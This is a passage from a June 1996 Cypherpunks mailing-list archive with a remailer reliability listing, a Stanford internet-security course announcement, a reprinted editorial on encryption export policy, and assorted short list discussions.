hJd+T717sUX9xQ8lsiZHWZ27+Hvb0a8Y2yJ0ugYAKg5jTFfbSkxgpodSXdorqi7c
Mlt6fLof080=
=QCge
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 11 Jun 1996 06:02:17 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199606101350.GAA12423@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 10 Jun 96 6:48:03 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              *+*********+     5:38  99.97%
nymrod   nymrod@nym.jpunix.com                    +**#     7:18  99.95%
flame    remailer@flame.alias.net         ---+++++++++  1:07:16  99.94%
alumni   hal@alumni.caltech.edu            -##-*######     8:52  99.92%
mix      mixmaster@remail.obscura.com     +++-_.-.-+++  9:01:40  99.88%
treehole remailer@mockingbird.alias.net   -.-_.--+-+++  6:53:46  99.87%
alpha    alias@alpha.c2.org               ++**++-++***    43:27  99.82%
ecafe    cpunk@remail.ecafe.org           ##*#**#*##.-  2:32:01  99.82%
c2       remail@c2.org                    ++++----++-+    50:04  99.80%
amnesia  amnesia@chardos.connix.com       -----------   3:25:22  99.74%
vegas    remailer@vegas.gateway.com       -***+**-** *    12:10  99.57%
portal   hfinney@shell.portal.com         # ##-####*##     9:04  99.37%
lead     mix@zifi.genetics.utah.edu       ++++ +++-+++    57:39  96.99%
ncognito ncognito@rigel.cyberpass.net             -.    5:56:16  96.90%
exon     remailer@remailer.nl.com         * *+****** *     5:53  96.70%
haystack haystack@holy.cow.net            +# ##*#*#* +     9:32  96.44%
penet    anon@anon.penet.fi               __-----      39:12:37  88.74%
extropia remail@miron.vip.best.com        -----.----    7:07:20  83.80%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 10 Jun 1996 23:00:28 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Gore's speech writers
In-Reply-To: <ade0d4f70b021004dfaf@[205.199.118.202]>
Message-ID: <4lizxrC00YUy41ClsW@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 9-Jun-96 Gore's speech writers by
Timothy C. May@got.net 
> I read an interesting op-ed piece about how wonderful Bob Dole's
> resignation-from-the-Senate speech was, about how resonant and thoughtful
> it was. But the piece went on to point out that the speech was
> "un-Dole-like." Turns out it was written by Mark Helprin, a former WSJ
> writer and current novelist. Dole is just a typical politician.

I've been a fan of Helprin's short stories for a number of years -- he
is a beautiful writer and talented wordsmith. Helprin can make a
paragraph get up, get down, and do the fandango.

If anything is going to give Dole a competitive edge during this
campaign, it's Mark Helprin.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 11 Jun 1996 07:49:54 +0800
To: cypherpunks@toad.com
Subject: [SF Bay Area] Internet security course at Stanford
Message-ID: <v01540b00ade1ee2d4b2b@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain




Seen on the net:


The Western Institute of Computer Science announces
a week-long course on

INTERNET SECURITY

taught at Stanford University

July 29 -- August 2, 1996

by Arthur M. Keller (Stanford University)
David H. Crocker (Brandenburg Consulting)
Tina M. Darmohray (Information Warehouse!)
Whitfield Diffie (Sun Microsystems)
Mark Eichin (Cygnus Support)
Alan Fedeli (IBM)
Gail Grant (Open Market)
Lance Hoffman (George Washington University)
Peter G. Neumann (SRI International)
Allan Schiffman (Terisa Systems)

A Practical Week-long Course for Consultants, Educators, Government
and Industry Scientists and Engineers

This course is taught by leading researchers and practitioners in the
area of internet security: Arthur M. Keller, Dave Crocker, Tina M.
Darmohray, Whitfield Diffie, Mark Eichin, Alan Fedeli, Gail Grant,
Lance Hoffman, Peter Neumann, and Allan M. Schiffman.  Participants
will receive a grounding in internet security, familiarity with
current concepts and issues, and exposure to the most important
research and development trends in the area.

Connecting to the Internet brings both unparalleled information
resources and unparalleled security dangers.  Protecting computer
systems and networks from attacks is a critical and ongoing process.
Equally important is protecting corporate intellectual property
assets from inappropriate access.  This course will examine a variety of
network security topics, including protecting against intrusion,
detecting and tracking intruders, and repairing damage after
intrusion.

The course will being with a survey of risk analysis and setting up
emergency responses to network incidents.  We then follow with a
detailed description of cryptography, including cryptographic policy
and a panel.  The course will then cover specific security
technologies.  These include network firewalls (which provide
perimeter security), Kerberos and adding security to existing network
applications, secure messaging, secure payments, and World Wide Web
security (including SSL).  This course will also analyze security
issues for electronic commerce.  We will also show a videotape
presentation on SATAN by Dan Farmer, one of its developers, and a
videotape presentation by John Markoff and Tsutomu Shimomura on
Takedown.

TEXT: Building_in_Big_Brother, Lance Hoffman, and a complete set of
course notes.

PREREQUISITES: This course assumes a general knowledge of
computers and using the Internet.

WHO SHOULD ATTEND: Computer programmers, system managers, computer
operations staff and managers, information technologists and managers,
and teachers who want to gain insight into the capabilities,
implementation and current trends in this emerging technology.

COURSE SCHEDULE: INTERNET SECURITY
Course dates:   July 29 -- August 2, 1996
Schedule   AM1: 9:00 -- 10:30       AM2:   11:00 -- 12:30
           PM1: 1:30 --  3:00       PM2:    3:30 --  5:00

Mon AM  Security Overview
        . Risk Analysis: Lance Hoffman
        . Setting up Emergency Responses to Network Incidents: Alan Fedeli

Mon PM  Cryptography
        . Cryptography 1: Whitfield Diffie
        . Cryptography 2: Whitfield Diffie

Tue AM  Cryptography
        . Cryptography 3: Whitfield Diffie
        . Cryptography 4: Whitfield Diffie

Tue PM  Cryptography
        . Cryptographic policy: Lance Hoffman
        . Cryptography panel: Lance Hoffman (moderator), Peter Neumann,
          Whitfield Diffie

Wed AM  Firewalls
        . Firewall overview and design: Tina Darmohray
        . Packet filtering, proxies, firewall toolkits: Tina Darmohray

Wed PM  SATAN: Dan Farmer by videotape
        Takedown: John Markoff and Tsutomu Shimomura by videotape

Thu AM  Kerberos: Mark Eichin
        Adding security to existing network applications: Mark Eichin

Thu PM  Security for Messaging: Dave Crocker
        Secure payments: Gail Grant

Fri AM  WWW security: Allan Schiffman
        SSL: Allan Schiffman

Fri PM  panel: Arthur Keller (moderator), Dave Crocker, Whitfield Diffie,
        Peter Neumann, Allan Schiffman

ABOUT THE INSTRUCTORS

DR. ARTHUR M. KELLER is a Senior Research Scientist at Stanford
University.  He is Project Manager of Stanford University's
participation in CommerceNet, which is doing the first large-scale
market trial of electronic commerce on the Internet.  He leads the
effort on smart catalogs and virtual catalogs.  He was Manager of the
Penguin project, to provide sharing of persistent object data among
multiple applications.  He is also working on managing inconsistency
in federated, autonomous database systems.  His publications include
work on database security, databases on parallel computers, incomplete
information in databases, database system implementation, hypertext
databases, and computerized typesetting.

DAVID H. CROCKER is a principal with Brandenburg Consulting, providing
business and technical planning for distributed information products
and services.  He has participated in the development of
internetworking capabilities since 1972, first as part of the Arpanet
research community and more recently in the commercial sector.  Mr.
Crocker has made extensive contributions to the development of
electronic mail and other Internet services.  He has worked at a
number of Silicon Valley companies, producing a wide range of TCP/IP,
OSI, and network management products.  He serves as Chairman of the
non-profit Silicon Valley - Public Access Link, a community network
information service.  Mr. Crocker continues technical involvement in
Internet standards activities for transport services, electronic mail
and electronic commerce.

TINA M. DARMOHRAY is a senior consultant for Information Works!, which
specializes in Internet connections, firewall configurations, security
audits, and Internet workshops.  Previously Tina led the UNIX system
administration team at Lawrence Livermore National Laboratory, where
her team had responsibility for over 1000 machines.  Tina is a
founding board member of SAGE (USENIX System Administrators Guild) and
has over a decade of experience as a UNIX system and network
administrator and instructor.  She received her BS/MS from the
University of California at Berkeley.

DR. WHITFIELD DIFFIE, who holds the position of Distinguished Engineer
at Sun Microsystems, is best known for his 1975 discovery of the
concept of public key cryptography, for which he was awarded a
Doctorate in Technical Sciences (Honoris Causa) by the Swiss Federal
Institute of Technology in 1992.  For a dozen years prior to assuming
his present position in 1991, Diffie was Manager of Secure Systems
Research for Northern Telecom, functioning as the center of expertise
in advanced security technologies throughout the corporation.  Among
his achievements in this position was the design of the key management
architecture for NT's recently released PDSO security system for X.25
packet networks.  Diffie received a Bachelor of Science degree in
mathematics from the Massachusetts Institute of Technology in 1965.
He is the recipient of the IEEE Information Theory Society Best Paper
Award for 1979 and the IEEE Donald E. Fink award for 1981.

MARK EICHIN is the primary development engineer for Cygnus Network
Security, Mark Eichin has been involved in the development of the
Kerberos network security system since his days as an undergraduate at
MIT.  He continues to work closely with MIT on the development of
Kerberos.  He was also involved in the design and implementation of
the Zephyr Notification Service, which has been billed as one of the
most complex uses of Kerberos ever seen in an application.

ALAN FEDELI manages IBM network security functions including: IBM's
AntiVirus products and services, phone fraud, and external network
connectivity policy and security countermeasures.  He also manages
IBM's central Computer Emergency Response Team (CERT), which handles
harmful code and network intrusions worldwide, for IBM and customers.
He formed IBM's Internet Emergency Response Service (ERS) as a
fee-based commercial offering.  He has been a manager of technology in
IBM for the past 20 years.  He has managed systems programming,
network software development, and in the past 7 years he has created
information security businesses within IBM.  He is a graduate of City
College of New York, and recently earned his MBA in Organizational
Behavior at Pace University.

GAIL GRANT is the vice president for Business Development for Open
Market, Inc., responsible for evaluation of potential technology
partners and long-term technical requirements.  She also is the
chairman of the Network Services Working Group in CommerceNet, which
is working to facilitate the development, standardization and
deployment of protocols, applications and enabling technologies which
provide authentication, privacy/encryption and certification services
over the Internet in a secure and interoperable manner.  Prior to
joining OMI in 1994, Ms. Grant pioneered the Internet Alpha Program
for Digital Equipment Corporation.  This innovative, industry-first
program generated millions in revenues and was featured in numerous
publications, including Fortune Magazine, The New York Times and USA
Today.  Previous positions include development and development
management positions at Bolt Beranek and Newman in Cambridge MA and in
Cardiac Research at Mass. General Hospital in Boston MA.  Ms. Grant
presents regularly at conferences on the Internet, World-Wide Web and
Electronic Commerce as well as recently authoring a chapter on
Internet business transaction systems for Mary Cronin's upcoming book
in Internet strategies to be published by Harvard Business School
Press.

DR. LANCE J. HOFFMAN is Professor of Electrical Engineering and
Computer Science at The George Washington University in Washington, D.
C. and Director of the School of Engineering's Institute on Computer
and Telecommunications Systems Policy.  He is known for his pioneering
research on computer security and risk analysis, and for his
interdisciplinary work in computer policy issues.  Dr. Hoffman is the
author or editor of five books and numerous articles on computer
security and privacy; his new work on cryptographic policy, Building
in Big Brother, is the first book devoted to the topic.  He also is
the editor of the well-received readings book Rogue Programs: Viruses,
Worms and Trojan Horses.  Dr. Hoffman has lectured around the world on
computer security and privacy and on the vulnerability of society to
computer systems.  Dr. Hoffman was previously a National Lecturer for
the Association for Computing Machinery and a Distinguished Visitor
for the Institute of Electrical and Electronics Engineers.  He served
as general chairman of the Second Conference on Computers, Freedom,
and Privacy, held in March 1992 in Washington.  He is past chair of
the IEEE Committee on Communications and Information Policy's
Subcommittee on Information Security and Applications.  Dr. Hoffman is
a member of the National Advisory Board of the newsletter Privacy and
American Business and a Fellow of the Association for Computing
Machinery.

DR. PETER G. NEUMANN is a principal scientist in the Computer Science
Laboratory at SRI, where he has been since 1971, and his work is
concerned with computer systems having requirements for security,
reliability, human safety, and high assurance (including formal
methods).  He was founder and Editor of the SIGSOFT Software
Engineering Notes (1976-1993), and is Chairman of the ACM Committee on
Computers and Public Policy (since 1985), a Contributing Editor for
CACM (since 1990), and creator (in 1985) and moderator of the ACM
Forum on Risks to the Public in the Use of Computers and Related
Technology.  His RISKS-derived book on the benefits and pitfalls of
computer-communication technology, Computer-Related Risks, is
published by ACM Press and Addison Wesley.

ALLAN M. SCHIFFMAN was named chief technical officer of Terisa Systems
in April 1995.  He was formerly chief technical officer of EIT, one
of the founders of Terisa.  He is principal architect of CommerceNet,
a Bay Area consortium supporting electronic commerce over the
Internet.  His current obsession is Internet transaction security and
has been working for the last year on Secure HTTP.  Schiffman was
previously vice president of technical strategy for ParcPlace Systems
where he led the development of their well-known Objectworks\Smalltalk
product family.  Prior to this, he was senior MTS at Schlumberger
Research and assistant director of the Fairchild Laboratory for
Artificial Intelligence Research.  He holds an M.S. in Computer
Science from Stanford University.

COURSE INFORMATION
Dates:  Monday-Friday, July 29-August 2, 1996
Times:  Registration Sunday afternoon, July 28
        Morning sessions 9:00am-12:30pm with a 30 minute break
        Afternoon sessions 1:30-5:00pm with a 30 minute break
        Lunch break 12:30-1:30pm daily
Location:       on the campus of Stanford University in Stanford, CA.
Course Fee:
        $1,450 (includes instruction, complete set of course notes,
        break refreshments, and Tuesday night reception.)
        $1,575 for registration after July 15
Group Discount: A $100 discount is given to each individual when three or
        more register from the same organization for one of the courses.
Accommodations: Housing information will be mailed at the request of the
        participant after enrollment.
Parking permits are available at the Sunday afternoon course registration and
        are not included in your registration fee.  Out-of-town participants
        will probably NOT need a car during the week.
Transportation: from San Francisco International Airport: Shuttle
        service (Airport Connection) to the Stanford Campus approx. $17.00
        each way; from San Jose International Airport: approx. $17.00

GENERAL INFORMATION
Registration:   Mail the registration form to the Western Institute of
        Computer Science, P.O. Box 1238, Magalia, CA 95954;
        FAX the registration form with your VISA/Mastercard number or company
        purchase order number to (916) 873-6697; or
        EMAIL your registration with company purchase order number or
        VISA or Mastercard number to barnhill@hudson.stanford.edu;
        TELEPHONE (916) 873-0575 with your company purchase order number or
        VISA or Mastercard numbers.
CANCELLATIONS:  are accepted up to 14 working days prior to the start of the
        course. A $100 processing fee will be assessed.  After that date,
        no refunds will be given, but you may send a substitute in your
        place. If WICS is forced to cancel a course for any reason, liability
        is limited to the return of the paid registration fee.
FOR INFORMATION: Call Western Institute of Computer Science
        at (916) 873-0575; email to barnhill@hudson.stanford.edu.

_____________________________________________________________________________
Registration Form
INTERNET SECURITY
July 24-28, 1995

Registration on or before July 15
[  ] INTERNET SECURITY                                              $1,450
Registration after July 15
[  ] INTERNET SECURITY                                              $1,575

Name____________________________________

Title___________________________________

Company_________________________________

Address_________________________________

________________________________________

City/State______________________________

Zip___________________

Country_________________

Work Phone (________)___________________

Home Phone (________)___________________

Electronic Mail address __________________________

        on network _____________________


Total amount enclosed: $___________

Method of payment
[  ] Check enclosed (payable to WICS)

[  ] Visa/Mastercard #________________________________ card exp. date__________

        cardholder signature___________________________________________________

[  ] Bill my company. Purchase Order #__________________________
        Write billing address below.

Return registration form with payment to:
Western Institute of Computer Science
P.O. Box 1238
Magalia, CA 95954-1238

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 11 Jun 1996 05:15:25 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: Gore opposes unwarranted'' Internet censorship
In-Reply-To: <9606100105.AA23760@rpcp.mit.edu>
Message-ID: <31BC1F14.6AE@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Joseph M. Reagle Jr. wrote:
> 
> Sounds good but I had to laugh when I heard it... is he at odds with
> other members of the administration, or is this rhetoric?

Good cop, bad cop.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Tue, 11 Jun 1996 06:10:33 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Report from Germany on "backdoor" net-censorship
Message-ID: <v02140b00ade1ed543c0f@[17.202.12.102]>
MIME-Version: 1.0
Content-Type: text/plain


>>Criteria for the ICTF's proceed will be developed, evaluated and
>>continuously updated by the Internet Medienrat. As an independant
>>gremium, the Internet Medienrat tries to achieve a social consensus
>>in the use of online media without government [sic! um] censorship.
>
>Is that any relation to the Judenrat that ran the inside of the Ghettos and
>Concentrated Camps during the late unpleasantness in Deutschland?
>
>DCF

Linguistically or politically?

If my (almost totally forgotten) German is correct, the suffix -rat
means "council" or "ministry" or, rather more generally, "governing
body."

But, you probably knew that already.

Cheers

Martin.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sead@cost.se
Date: Mon, 10 Jun 1996 20:12:04 +0800
To: cypherpunks@toad.com
Subject: COST CA/WWW Security
Message-ID: <199606100832.KAA17108@cost1.cost.se>
MIME-Version: 1.0
Content-Type: text/plain


To whom it may concern:

This message is based on some questions recently posted at this mailing list
concerning the issues of certification technology, certification authorities
and related security applications, especially Secure WWW syste, combined with 
usage of certificates.

For all interested, I would like to invite you to visit our WWW server
(http://www.cost.se) where you may find all the information about our
current security products. You may also browse our CA infrastructure.

In case of any further question, please contact me directly.

Regards,

Sead Muftic




____________________________________________
Sead Muftic
COST - Computer Security Technologies CST AB
E-mail: sead@cost.se
Tel: +46-8-16 16 92
Fax: +46-8-471-7722 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Tue, 11 Jun 1996 03:12:03 +0800
To: cypherpunks@toad.com
Subject: New signature
Message-ID: <m0uT79y-00035TC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok you all happy now i made my signature 4 lines. After god knows how many
people were bitching at me to change it.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage     Gaa- 3.69 (for ice hockey goalie)
<jwilk@iglou.com> President of Revolution Software
Quote- Does whiskey count as beer? -Homer Simpson          
Current Girlfriend - Lindsey Wilcox
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 11 Jun 1996 05:30:44 +0800
To: <cypherpunks@toad.com
Subject: Re: [NOISE] I swear I am not making this up. (rec.music.white-po
Message-ID: <199606101409.HAA21056@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Received: from toad.com [140.174.2.1] by alcor.process.com
           with SMTP-OpenVMS via TCP/IP; Fri, 7 Jun 1996 23:37 -0400
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id SAA15816 for cypherpunks-outgoing; Fri, 7 Jun 1996 18:38:51 -0700 (PDT)
Received: from infinity.c2.org (infinity.c2.org [140.174.185.11]) by toad.com (8.7.5/8.7.3) with ESMTP id SAA15811 for <cypherpunks@toad.com>; Fri, 7 Jun 1996 18:38:44 -0700 (PDT)
Received: (from ghio@localhost) by infinity.c2.org (8.7.4/8.6.9)
	id SAA18545; Fri, 7 Jun 1996 18:30:38 -0700 (PDT)
	Community ConneXion: Privacy & Community: <URL:http://www.c2.net>
Date: Fri, 7 Jun 1996 18:30:38 -0700 (PDT)
Message-Id: <199606080130.SAA18545@infinity.c2.org>
X-Plug: Community ConneXion offers privacy on the internet.  http://www.c2.org/
From: ezundel@alpha.c2.org (E. Zundel Repost)

>From: bb748@FreeNet.Carleton.CA (Milton Kleim)
>Newsgroups: news.groups,alt.skinheads,alt.politics.nationalism.white,
 >           alt.politics.white-power
>Subject: Statement Regarding rec.music.white-power

>Now that the results for our newsgroup proposal have been issued, we wish 
>to make a statement concerning our objectives.
>
>Three objectives were sought in the rec.music.white-power project:
>
[...]
>
>#3: Create a newsgroup for discussion and promotion of Aryan music. 
[...]

You mean those wonderful ragas and songs from the Vedas, don't you?
I ust *love* sitar music.

Check out The Aryan Pages at http://www.cs.man.ac.uk/~pateld/aryan_dir/aryan.html

Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 11 Jun 1996 02:02:40 +0800
To: cypherpunks@toad.com
Subject: NYT on Crypto Policy
Message-ID: <199606101036.KAA26662@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, June 10, 1996, p. A10. 
 
 
   The New Encryption Universe [Editorial] 
 
 
   The development of inexpensive computer programs and 
   hardware that scramble telephone calls and computer 
   messages to prevent eavesdropping is rapidly transforming 
   the world of cryptography. Once largely the domain of 
   governments and their intelligence services, encryption 
   technology is now commonly used by corporations, banks, 
   securities firms and individual computer operators. It is 
   time to revise Government encryption policy to fit this new 
   universe. 
 
   A panel of the National Research Council makes a convincing 
   case for doing just that after a careful review of 
   encryption issues. The panel calls on the Government to 
   abandon its effort to limit the development and 
   availability of advanced encryption technology. The Clinton 
   Administration has fought to preserve the Government's 
   ability to access commercial and individual communications 
   for law enforcement purposes by encouraging adoption of a 
   single encryption standard that Government agencies could 
   track and decipher if needed. 
 
   The Research Council panel leans the other way, urging the 
   commercial development of powerful encryption software even 
   though it would make wiretapping more difficult. It also 
   recommends that Washington ease restrictions on exports of 
   encryption technology. 
 
   The Government has long framed the debate over commercial 
   encryption around its need to fight crime through 
   wiretapping. The panel recognizes the usefulness of 
   court-authorized wiretaps. But the panel suggests that a 
   more important issue is the ability of the private sector 
   to transfer confidential financial and other data over 
   telecommunications pathways without interception. 
 
   The Clinton Administration wants the private sector to 
   adopt a type of encryption technology, known as key escrow, 
   that would give the Government the ability to unscramble 
   private phone or computer messages with court authorization 
   and thereby preserve its wiretap capability. But the policy 
   has so far failed several practical tests. The private 
   sector has not voluntarily adopted a Government-controlled 
   technology. In addition, encryption programs are already 
   available that allow almost anyone with a computer and 
   modem to work around Government-controlled technology. One 
   sophisticated system would allow two strangers -- people 
   who had swapped no private passwords -- to read each 
   other's encoded messages. 
 
   It seems likely that the Administration approach will not 
   succeed. If so, the danger is that Washington might move to 
   outlaw encryption technology it has not approved, a step 
   that would grossly violate American civil liberties. The 
   best way for the Government to protect its ability to 
   eavesdrop on domestic and foreign criminals is to stay 
   technically ahead of them. The panel recommends vigorous 
   Government research programs to that end. 
 
   The Research Council group would permit American computer 
   companies to export more powerful encryption software than 
   currently permitted. Foreigners already have access to 
   encryption systems that are more powerful than those 
   American companies are allowed to sell. The export 
   restrictions do nothing to keep encryption software out of 
   the hands of criminals and hostile governments, but 
   needlessly drive American exports out of foreign markets. 
 
   The panel's conclusions are especially credible because its 
   membership was not tilted against the Government. The 
   16-member panel was led by Kenneth Dam, a former Deputy 
   Secretary of State, and included Benjamin Civiletti, a 
   former Attorney General, and Ann Caracristi, a former 
   deputy director of the National Security Agency. The 
   Clinton Administration should take notice. It needs a new 
   encryption policy. 
 
   -- 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Tue, 11 Jun 1996 08:35:11 +0800
To: cypherpunks@toad.com
Subject: Kahn's "The CodeBreakers"
Message-ID: <199606101738.KAA11362@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


C-Punks,

Just as an interesting side note.....

I got lucky this weekend and found a First Edition copy of David 
Kahn's "The Code Breakers" at a little bookstore in Port Townsend, 
Washington.  WHAT A SHOCK!!!  Anyway, I snagged it for $25.00. 
 The cover has been laminated (library style, 
not card style) and it is in excellent condition.

For those wondering what the significance of Port Townsend is...well, 
there is none.  It is, however, the location of Fort Worden which is 
where "An Officer and a Gentleman" was filmed.  (Major piece of 
military history, isn't it?)

Anyway, if any one is looking for a copy, mine is not for sale, but 
the owner of the store said that she has seen copies come through every 
now and again.  (Not necessarily First Ed's)  If you are interested 
in getting in touch with the store, let me know.

Please use my work address,

brads@trisource.com

Brad Shantz
TRIsource Windows Development Services
2825 Eastlake Ave. E. Suite 100
Seattle, WA 98012-3062





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Mon, 10 Jun 1996 15:46:38 +0800
To: cypherpunks@toad.com
Subject: New Encryption Algorithm and Program
Message-ID: <1.5.4.32.19960610011120.006b41cc@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello there everyone subscribing to this mailing list...
My name is Benjamin Grosman and I am a 17 year old student from Sydney,
Australia...but please, don't hold any of that against me :)

Anyway, for my major assignment I wrote an encryption program under Turbo
Pascal for Dos, version 7.0, and for this program I developed the algorithm
myself...
Now, what I am wodnering is, is there anyone on this list who might be
interested in testing my program, and or analyisng the strength of the
encryption and reporting there findings back to me? The more people who are
knowledgeable in the field of encryption who want to have a look, the
better, so please, don't hesitate, as I would really appreciate all input....

As you all might have guessed, I am definitely pro-encryption. I have some
particularly malicious "friends" who go to great pains to find out what you
typed in your latest assignments...before they are due...and so I have
undertaken this project out of necessity as much as interest, and I find the
US governments ban on the exportation of cypher technology and knowledge a
great burden on the academic community in their efforts to further their
knowledge...but please don't sledge me for my views, just please respond to:
bgrosman@healey.com.au if you are interested in obtaining a copy of my
program...

Many thanks....
Ben





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 11 Jun 1996 09:43:52 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606101827.LAA02620@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:01 PM 6/9/96 +0200, Anonymous wrote:
>
>Bryce wrote (whilst on his high horse):
>
>> Hm.  I think the best we could hope for is along the lines of
>> "The suspect subscribed to the 'Cypherpunks' discussion group on
>> the Internet, but his violent views were rejected by the members
>> of the group."
>
>Not every member of this list rejects his views.  I for one do not
>reject them outright, but will not defend his views publically for
>fear of embarassing the corporation that I work for. 

Some day, the "embarrassment" may be among those who misunderstood an idea 
that is, by then, fully operational and was an improvement over the previous 
system.  I seem to recall some funny poster titled something like "The five 
